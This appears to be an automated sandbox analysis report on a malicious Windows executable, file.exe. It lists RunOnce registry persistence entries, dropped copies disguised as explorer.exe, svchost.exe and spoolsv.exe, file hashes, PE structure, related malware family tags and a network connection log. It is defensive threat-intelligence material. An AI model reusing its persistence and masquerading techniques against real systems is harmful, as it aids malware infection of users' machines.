                                              16:07:56AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
                                              16:08:05AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              googlecode.l.googleusercontent.comfile.exeGet hashmaliciousCryptOne, MofksysBrowse
                                              • 64.233.167.82
                                              file.exeGet hashmaliciousCryptOne, MofksysBrowse
                                              • 64.233.166.82
                                              1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                              • 173.194.76.82
                                              WDmtxCts5K.exeGet hashmaliciousCryptOneBrowse
                                              • 74.125.206.82
                                              chiara.exeGet hashmaliciousCryptOne, DarkTortilla, Mofksys, XWormBrowse
                                              • 66.102.1.82
                                              OX481bF1Vh.exeGet hashmaliciousBabadeda, MofksysBrowse
                                              • 74.125.133.82
                                              7Y18r(169).exeGet hashmaliciousCryptOneBrowse
                                              • 142.250.110.82
                                              LisectAVT_2403002B_401.exeGet hashmaliciousCryptOneBrowse
                                              • 74.125.133.82
                                              LisectAVT_2403002B_437.exeGet hashmaliciousCryptOneBrowse
                                              • 142.251.5.82
                                              yvRR2xvOtR.exeGet hashmaliciousCryptOne, HackBrowserData Tool, Kimsuky, Mofksys, TrollStealerBrowse
                                              • 108.177.15.82
                                              No context
                                              No context
                                              No context
                                              Process:C:\Windows\Resources\Themes\explorer.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.4022769148265937
                                              Encrypted:false
                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                              MD5:1E6AF6327736E3508F1C50506326C220
                                              SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                              SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                              SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\svchost.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.4022769148265937
                                              Encrypted:false
                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                              MD5:1E6AF6327736E3508F1C50506326C220
                                              SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                              SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
                                              SHA-512:88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\spoolsv.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):1.0150719828554693
                                              Encrypted:false
                                              SSDEEP:6:rl91bxbtg/Ul+CFQXF+ft9Xblt59Xh9XR5+1lf35X:rl3b/VFQFabltD7Ovf5
                                              MD5:6ACE8608B0514DDFD93BDE82793CEFA5
                                              SHA1:6CF1830086F60C348B999B4C36D8CFB21DE5E9F3
                                              SHA-256:D49788FD96465D0C966A4700F53A4D3C7F0238DC71384A6C2B76B2FC37E5BF36
                                              SHA-512:3DAD6CA6A70C3F4737313F91F6CF23955A9A0CD1630AEA0FC780B1D2E9C53CB8ABCF375263A229C809132524931FF0FE157233488688138B90F03DDC81D6CC9A
                                              Malicious:false
                                              Reputation:low
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\Themes\explorer.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):1.0150719828554693
                                              Encrypted:false
                                              SSDEEP:6:rl91bxbtg/Ul+CFQXmMt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ9bltD7Ovf5
                                              MD5:47128A088CA935B35632E395F19F3E9E
                                              SHA1:9FFFF4BAFCFF855225222BC6AA093BB21CD2FC7F
                                              SHA-256:1E59CBE9343BAAAAA74D02B27F796F0B083F6ADBA6CCAF6612C0B0B059008D05
                                              SHA-512:EFC13273D750D6CFB976E86AE0FFA2DD41E022510D28F06D0E29D3A3102DE8B0CD28DB26FE259AD25CF105C378192CBA0F4860B0232127C34B7C4A3A89CD2C4C
                                              Malicious:false
                                              Reputation:low
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):1.013049389676441
                                              Encrypted:false
                                              SSDEEP:6:rl91bxbtg/Ul+CFQXgxt9Xblt59Xh9XR5+1lf35X:rl3b/VFQghbltD7Ovf5
                                              MD5:49F101242BCFF77C4868F3DB159C892D
                                              SHA1:93CC920FF451961723EBF907CFEDED4862B5CE9F
                                              SHA-256:FE6726F6603DA6245511542528A6FC3136FA196068B33217DE8FD246B423A191
                                              SHA-512:4DDED2A8E0EDB078C40A1DA54C46BDCF34E731F506F4453745DCB1135069AAC80A14E813BD9417BBB395CC5D16640352B318676314AC6A710344C222482B1467
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\svchost.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):1.013941917518715
                                              Encrypted:false
                                              SSDEEP:6:rl91bxbtg/Ul+CFQXZZft9Xblt59Xh9XR5+1lf35X:rl3b/VFQDnbltD7Ovf5
                                              MD5:EA59886B697D95D198DEDA2A78AE22EF
                                              SHA1:8994DE519D0DEB4D627C3C9AE1C30FDE02A3E1A7
                                              SHA-256:965FDFEEA6F5E6BABE8D028D948F5BFD0ABD6E14BA06829E6AADECD57AFAAD13
                                              SHA-512:E8BB2B3CC3BCC5C4AD256C5B13AE5AF777DEE9F8CC4918EE65268306AC66E246A206D3690C333C70BA2634703CD2016AA5227660FC2F6A7BC3ED2EEC6AC111FF
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\spoolsv.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):5632
                                              Entropy (8bit):1.0147168692191055
                                              Encrypted:false
                                              SSDEEP:6:rl91bxbtg/Ul+CFQXiCXt9Xblt59Xh9XR5+1lf35X:rl3b/VFQRPbltD7Ovf5
                                              MD5:F8619869631D3227A758E99B034C761A
                                              SHA1:5BBB3FF8C15F107652E9156027D2525FBB34B452
                                              SHA-256:E8B9801B927DA21D086EEFD3867C61E6BCEFF9236A4371793BF00E8C0E5F152E
                                              SHA-512:03305AFC0C5E52194C97A9B502D1465E644718543DAF8812C513857DB815C56D3EA74335CF288FDACF74A3F1537F034F73996550F42CC5D2B6ADD70497BA24A2
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                              Category:dropped
                                              Size (bytes):759734
                                              Entropy (8bit):7.918879188690235
                                              Encrypted:false
                                              SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1FB:lIg4kt0Kd6F6CNzYhUiEWEYcw5
                                              MD5:6490C0CC4233043407A5C6E1EB702275
                                              SHA1:70325D7B16E2C51777055F163E7A236B8BE56811
                                              SHA-256:9E190FA3C2D30A92F8EC54642BB569CC97C443B407954B549B88CFC805A83238
                                              SHA-512:23E8543B4396937357DF74A9350D15C480468B4B5F42CC1D2BDC2658AF5D0EC43EE1F9032F1AE7CB77EC9E31AC92325345D946D84ECDAC7FB128D98DD913900F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@.......................... 7......E........................................-.D.......................................................................................................................................................@............ ..........................@............ ........................5.@....rsrc.... ....... ..................@.............+.........................@....data.........-.....................@...........................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\Themes\explorer.exe
                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                              Category:dropped
                                              Size (bytes):759773
                                              Entropy (8bit):7.917967950431219
                                              Encrypted:false
                                              SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1FT:lIg4kt0Kd6F6CNzYhUiEWEYcwb
                                              MD5:C144DDCD3247BB6C8AC4F6B2B6B222B7
                                              SHA1:38C88A7E4B5093933D6C86B4EF3B928873E425F0
                                              SHA-256:A34F95CB54F3C9C743CFE282A13E29D356480D8302F26C01BCBBED52DE868E0A
                                              SHA-512:DED848623B9588C8739CCFB5550921A7355AE2E1E77B42035EB193C08C3C6C984473259BFE9BDBEF9D701790FE2480149DE90706A5097FBA48F33B0A0C68C149
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@.......................... 7......E........................................-.D.......................................................................................................................................................@............ ..........................@............ ........................5.@....rsrc.... ....... ..................@.............+.........................@....data.........-.....................@...........................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\Resources\spoolsv.exe
                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                              Category:dropped
                                              Size (bytes):759655
                                              Entropy (8bit):7.915073975270819
                                              Encrypted:false
                                              SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1FR:lIg4kt0Kd6F6CNzYhUiEWEYcwp
                                              MD5:1154F5064F5C17DA195589BD31C809B6
                                              SHA1:FE60855E60A4104B04E5AE7BB9865AE147B1E298
                                              SHA-256:44B3A6CCF27AE541F6B97C750FB6FF3A18FF1CC9C87F8B65A3A5C898884A48D3
                                              SHA-512:AC564E97BC66010F525FD7C3F228343B6744AA5B611BACB5DC0FE9649CD3C88360AF05BF544C4180174CAC232E5BC30BF77C3CB3BFFE58E5A37FF9FF7C36C39C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@.......................... 7......E........................................-.D.......................................................................................................................................................@............ ..........................@............ ........................5.@....rsrc.... ....... ..................@.............+.........................@....data.........-.....................@...........................................................................................................................................................................................................................................................................................................................................
                                              File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                              Entropy (8bit):7.915078309937653
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:759'750 bytes
                                              MD5:778e416a842e89f25666cb5c173b0986
                                              SHA1:6b077356c06d690ac72c45e2b628f2ac57f5cb05
                                              SHA256:37dc14eef49eb9822e1e96eba5f2151900d20debd27ea17b7bf57ef9f83a66b5
                                              SHA512:f3c2da450ad08c8ece8298919a319af93eeffcb267b82d83852f543aeb5d91f9766ac96c0e7b5c3e55fae331685e238ab0dca58bf198d0c4e81fada11a911633
                                              SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1Fh:lIg4kt0Kd6F6CNzYhUiEWEYcwZ
                                              TLSH:37F4C0C80B75533AD246F1F0A5D07B684707C4D6D342E7819A9B2CC9D873B8FC62A96E
                                              File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@................
                                              Icon Hash:666b25252d0b4e31
                                              Entrypoint:0x409eac
                                              Entrypoint Section:
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:
                                              Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:5962c6b29ed5e50f362bf7495f752822
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              add esp, FFFFFFF0h
                                              mov eax, 00401000h
                                              call 00007F7C9CE62DC6h
                                              call far 5DE5h : 8B10C483h
                                              jmp 00007F7C9D1C65B1h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2d90000x244.data
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f0000x13e8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              0x10000x1a0000x900053d694a9daa31ab4f0d517d91f8189e2False0.9498697916666666OpenPGP Public Key7.851401794337924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              0x1b0000x20000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              0x1d0000x20000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x1f0000x20000x20004114c78b393d070eb343f5e4c4b3bdbeFalse0.2745361328125data3.1881047866122456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              0x210000x2b80000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .data0x2d90000x990000x990008737ac12682537591cf2c128fecc4b90False0.9860409007352942data7.939460972036294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x1f1300xcd0Device independent bitmap graphic, 32 x 64 x 24, image size 30720.4292682926829268
                                              RT_GROUP_ICON0x1fe000x14data1.15
                                              RT_VERSION0x1fe140x1ecdataEnglishUnited States0.5020325203252033
                                              RT_MANIFEST0x200000x3e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42542542542542544
                                              DLLImport
                                              kernel32.dllVirtualAlloc, VirtualFree, GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                              user32.dllMessageBoxA
                                              advapi32.dllRegCloseKey
                                              oleaut32.dllSysFreeString
                                              gdi32.dllCreateFontA
                                              shell32.dllShellExecuteA
                                              version.dllGetFileVersionInfoA
                                              msvbvm60.dllEVENT_SINK_GetIDsOfNames
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 30, 2024 16:08:01.545447111 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:01.552272081 CEST8065472172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:01.553165913 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:01.553464890 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:01.559568882 CEST8065472172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:02.130306005 CEST8065472172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:02.130327940 CEST8065472172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:02.130371094 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:02.130399942 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:02.131402969 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:02.131413937 CEST6547280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:03.491744995 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:03.497091055 CEST8065473108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:03.497240067 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:03.497498035 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:03.502513885 CEST8065473108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:04.208813906 CEST8065473108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:04.208839893 CEST8065473108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:04.208914995 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:04.208961010 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:04.258071899 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:04.258115053 CEST6547380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:05.714901924 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:05.720587969 CEST8065477142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:05.720658064 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:05.720885038 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:05.726414919 CEST8065477142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:06.481312037 CEST8065477142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:06.481391907 CEST8065477142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:06.481559038 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:06.481635094 CEST8065477142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:06.481930017 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:06.482348919 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:06.482491016 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:06.487425089 CEST8065477142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:06.487620115 CEST6547780192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:07.872873068 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:07.880294085 CEST8064068172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:07.880354881 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:07.938189983 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:07.943070889 CEST8064068172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:08.457994938 CEST8064068172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:08.458019018 CEST8064068172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:08.458060026 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:08.458091021 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:08.481086969 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:08.481138945 CEST6406880192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:10.076745033 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:10.152640104 CEST8064069108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:10.152724981 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:10.154377937 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:10.159221888 CEST8064069108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:10.890090942 CEST8064069108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:10.890117884 CEST8064069108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:10.890202999 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:10.890202999 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:10.892627001 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:10.892654896 CEST6406980192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:12.255455017 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:12.260457039 CEST8064071142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:12.260776043 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:12.634852886 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:12.639925957 CEST8064071142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:13.000113010 CEST8064071142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:13.000174999 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:13.000516891 CEST8064071142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:13.000559092 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:13.000559092 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:13.001610041 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:13.005768061 CEST8064071142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:13.006345987 CEST6407180192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:14.276612043 CEST6407280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:14.281770945 CEST8064072172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:14.281995058 CEST6407280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:14.282217979 CEST6407280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:14.287412882 CEST8064072172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:14.857279062 CEST8064072172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:14.857321024 CEST8064072172.253.115.82192.168.2.6
                                              Sep 30, 2024 16:08:14.857378006 CEST6407280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:14.979149103 CEST6407280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:14.979224920 CEST6407280192.168.2.6172.253.115.82
                                              Sep 30, 2024 16:08:17.027599096 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.032671928 CEST8064073108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:17.032780886 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.041480064 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.046844959 CEST8064073108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:17.767637968 CEST8064073108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:17.767698050 CEST8064073108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:17.767750025 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.767750025 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.769187927 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.769561052 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:17.775285006 CEST8064073108.177.15.82192.168.2.6
                                              Sep 30, 2024 16:08:17.775360107 CEST6407380192.168.2.6108.177.15.82
                                              Sep 30, 2024 16:08:19.760149002 CEST6407480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:19.764986038 CEST8064074142.250.110.82192.168.2.6
                                              Sep 30, 2024 16:08:19.766002893 CEST6407480192.168.2.6142.250.110.82
                                              Sep 30, 2024 16:08:19.766412973 CEST6407480192.168.2.6142.250.110.82
